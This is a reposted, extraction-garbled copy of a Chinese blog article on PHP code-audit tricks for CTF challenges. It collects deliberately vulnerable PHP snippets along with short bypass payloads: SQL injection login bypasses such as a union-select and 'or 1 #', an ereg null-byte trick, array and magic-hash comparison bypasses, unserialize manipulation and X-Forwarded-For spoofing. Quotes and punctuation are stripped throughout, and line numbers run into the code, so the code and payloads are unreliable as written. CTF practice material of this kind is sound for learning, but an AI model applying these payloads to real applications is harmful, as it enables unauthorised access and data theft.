当前位置: 首页 > 工具软件 > plog(PHP) > 使用案例 >

php代码审计ctf隐藏了目录,ctf中的php代码审计技巧 作者未知_W

上官季
2023-12-01

《ctf中的php代码审计技巧 作者未知_W》由会员分享,可在线阅读,更多相关《ctf中的php代码审计技巧 作者未知_W(15页珍藏版)》请在人人文库网上搜索。

1、ctf中的php代码审计技巧 作者:未知原文链接:http:/www.am0s.com/ctf/200.html收集整理:http:/www.nmd5.com/test/index.php本文由 干货12暂无公告 敏感函数 Home CTF ctf中的php代码审计技巧 ctf中的php代码审计技巧2017-02-07做ctf题时,遇到审计题时可能会遇到,翻翻记录可以很快的找到脑洞。 1.PHP123456PHP extract() file_get_contentsshiyan=&flag=1PHP123456789101112131415$flag=xxx; extract($_GET);。

2、 if(isset($shiyan)$content=trim(file_get_contents($flag); if($shiyan=$content)echoctfxxx;elseechoOh.no;内容纲要32.PHP123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354$value)$value = trim($value);is_string($value) & $req$key = addslashes($value);function 。

3、is_palindrome_number($number) $number = strval($number);$i = 0;$j = strlen($number) - 1; while($i where)$this-select($this-where);function select($where)$sql = mysql_query(select * from user where .$where);/ MySQLreturn mysql_fetch_array($sql);/if(isset($requsettoken)false/truefalse$login = unserial。

4、ize(gzuncompress(base64_decode($requsettoken);/gzuncompress:/unserialize:PHP$db = new db();$row = $db-select(user=.mysql_real_escape_string($loginuser).);/mysql_real_escape_string()if($loginuser = ichunqiu)echo $flag;SQLelse if($rowpass !=$loginpass) echo unserialize injection!;elseecho ( ) ;elsehea。

5、der(Location: index.php?error=1);?4.5PHP12345?php$arr = array(user = ichunqiu);$a = base64_encode(gzcompress(serialize($arr); echo $a;?12345678910111213141516171819202122232425262728293031323334353637383940414243444546476PHP1234567891011121314151617181920212223242526272829303132333435363738394041424。

6、3444546474849505152535455565758?php error_reporting(0);if (!isset($_POSTuname) | !isset($_POSTpwd) echo form action= method=post.br/; echo input name=uname type=text/.br/; echo input name=pwd type=text/.br/; echo input type=submit /.br/;echo /form.br/;echo !-source: source.txt-.br/; die;functionAtta。

7、ckFilter($StrKey,$StrValue,$ArrReq) if (is_array($StrValue)/$StrValue=implode($StrValue);/if (preg_match(/.$ArrReq./is,$StrValue)=1)/print ;exit();$filter = and|select|from|where|union|join|sleep|benchmark|,|(|); foreach($_POST as $key=$value)/AttackFilter($key,$value,$filter);$con = mysql_connect(X。

8、XXXXX,XXXXXX,XXXXXX); if (!$con)die(Could not connect: . mysql_error();$db=XXXXXX;mysql_select_db($db, $con);/ MySQL$sql=SELECT * FROM interest WHERE uname = $_POSTuname;$query = mysql_query($sql);/ MySQLif (mysql_num_rows($query) = 1) /759$key = mysql_fetch_array($query);/falseif($keypwd = $_POSTpw。

9、d) print CTFXXXXXX;elseprint ;elseprint ;mysql_close($con);?60 61 62 63 64 65 66 67 68 69 70 71 72 73 5.PHP123ereg payload 1e9%00*-*%00PHP12345678910111213141516171819202122232425?phpif (isset ($_GETpassword)if (ereg (a-zA-Z0-9+$, $_GETpassword) = FALSE)echo pYou password must be alphanumeric/p;else。

10、 if (strlen($_GETpassword) 8 & $_GETpassword 9999999)if (strpos ($_GETpassword, *-*) != FALSE)die(Flag: . $flag);elseecho(p*-* have not been found/p);elseecho pInvalid password/p;?PHP1admin GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1- -86.PHP1 if (isset($_GETa) 2 if (strcmp($_GETa, $flag) = 0) 3/。

11、4 die(Flag: .$flag);5 else6 print ; 7 8PHP1 payload:?a=1 2漏洞原理http:/www.am0s.com/functions/201.htmlPHP15.3strcmp 07.PHP1 ?php2 if (isset($_GETname) and isset($_GETpassword) 3 4 if ($_GETname = $_GETpassword)5 echo pYour password can not be your name!/p;6 else if (sha1($_GETname) = sha1($_GETpassword。

12、)7 die(Flag: .$flag);8 else9 echo pInvalid password./p; 10 11 else12 echo pLogin first!/p; 13 ?14PHP1 =bool2 sha1()md5()sha1()sha1()3 ?name=a&password=b8.PHP?php session_start();if (isset ($_GETpassword) if ($_GETpassword = $_SESSIONpassword) die (Flag: .$flag);elseprint pWrong guess./p;mt_srand(mic。

13、rotime() rand(1, 10000) % rand(1, 10000) + rand(1, 10000);?9.9PHP1234567891011121314151617181920212223242526272829303132333435?phpif($_POSTuser & $_POSTpass) $conn = mysql_connect(*, *, *); mysql_select_db(phpformysql) or die(Could not select database); if ($conn-connect_error) die(Connection failed。

14、: . mysql_error($conn);$user = $_POSTuser;$pass = md5($_POSTpass);$sql = select pw from php where user=$user;$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if ($rowpw) & (!strcasecmp($pass, $rowpw) /st。

15、r1str2 0str1str2 0 0echo pLogged in! Key:* /p;else echo(pLog in failure!/p);?PHP1cookiesession1234567891011通过构造sql语句使rowpw等于pass10.正则漏洞,%00截断 11.10PHPPHP1234567891011121314?php if(eregi(hackerDJ,$_GETid) echo(pnot allowed!/p); exit();$_GETid = urldecode($_GETid); if($_GETid = hackerDJ)echo pAccess g。

16、ranted!/p;echo pflag: * /p;?1112345678910111213141516171819202122232425262728293031?phpif($_POSTuser & $_POSTpass) $conn = mysql_connect(*, *, *); mysql_select_db(*) or die(Could not select database); if ($conn-connect_error) die(Connection failed: . mysql_error($conn);$user = $_POSTuser;$pass = md5。

17、($_POSTpass);$sql = select user from php where (user=$user) and (pw=$pass);$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if($rowuser=admin) echo pLogged in! Key: * /p;if($rowuser != admin) echo(pYou a。

18、re not admin!/p);?闭合注入,绕过验证 12.PHP?phpfunction GetIP() if(!empty($_SERVERHTTP_CLIENT_IP)$cip = $_SERVERHTTP_CLIENT_IP;else if(!empty($_SERVERHTTP_X_FORWARDED_FOR)$cip = $_SERVERHTTP_X_FORWARDED_FOR;else if(!empty($_SERVERREMOTE_ADDR)$cip = $_SERVERREMOTE_ADDR;else$cip = 0.0.0.0;return $cip;$GetIPs =。

19、 GetIP();if ($GetIPs=1.1.1.1)echo Great! Key is *;elseecho ?IP;添加http头即可13.240610708神奇的数字 14.12PHPPHP12345678910111213?php$md51 = md5(QNKCDZO);$a = $_GETa;$md52 = md5($a); if(isset($a)if ($a != QNKCDZO & $md51 = $md52) echo nctf*; else echo false!;elseecho please input a;?123456789101112131415161718。

20、1920212223?php if($_GETid) mysql_connect(SAE_MYSQL_HOST_M . : . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select_db(SAE_MYSQL_DB);$id = intval($_GETid);$query = mysql_fetch_array(mysql_query(select content from ctf2 where id=$id); if ($_GETid=1024) echo pno! try again/p;elseecho($querycont。

21、ent);?1024.115.此处还可以数组绕过16.13PHPPHP123456789if (isset ($_GETnctf) if (ereg (1-9+$, $_GETnctf) = FALSE) echo ;else if (strpos ($_GETnctf, #biubiubiu) != FALSE) die(Flag: .$flag);elseecho ;123456789101112131415#GOAL: login as admin,then get the flag;error_reporting(0); require db.inc.php;functionclean。

22、($str) if(get_magic_q uotes_gpc()$str=stripslashes($str);return htmlentities($str, ENT_QUOTES);$username = clean(string)$_GETusername);$password = clean(string)$_GETpassword);$query=SELECT * FROM users WHERE name=.$username. AND pass=.$password.;$result=mysql_query($query);if(!$result | mysql_num_ro。

23、ws($result) 1) die(Invalid password!);echo $flag;17.14PHP1payload:user=admin and 0=1 union select 47bce5c74f589f4867dbd57e9ca9f808 #&pass=aaaPHP12345678910111213141516171819?phpif($_POSTuser & $_POSTpass) mysql_connect(SAE_MYSQL_HOST_M . : . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select。

24、_db(SAE_MYSQL_DB);$user = $_POSTuser;$pass = md5($_POSTpass);$query = mysql_fetch_array(mysql_query(select pw from ctf where user= $user ); if ($querypw) & (!strcasecmp($pass, $querypw) /strcasecmp:0 -echo pLogged in! Key: ntcf* /p;else echo(pLog in failure!/p);?PHP1$query=SELECT * FROM users WHERE name=admin AND pass=or 1 #;1234567891011121314151617181920212215CTFadmin发表评论 *name.*email.website.SUBMIT(Ctrl + Enter) Proudlypowered bywordpress. Lion bybigfa. Made on aText message。

 类似资料: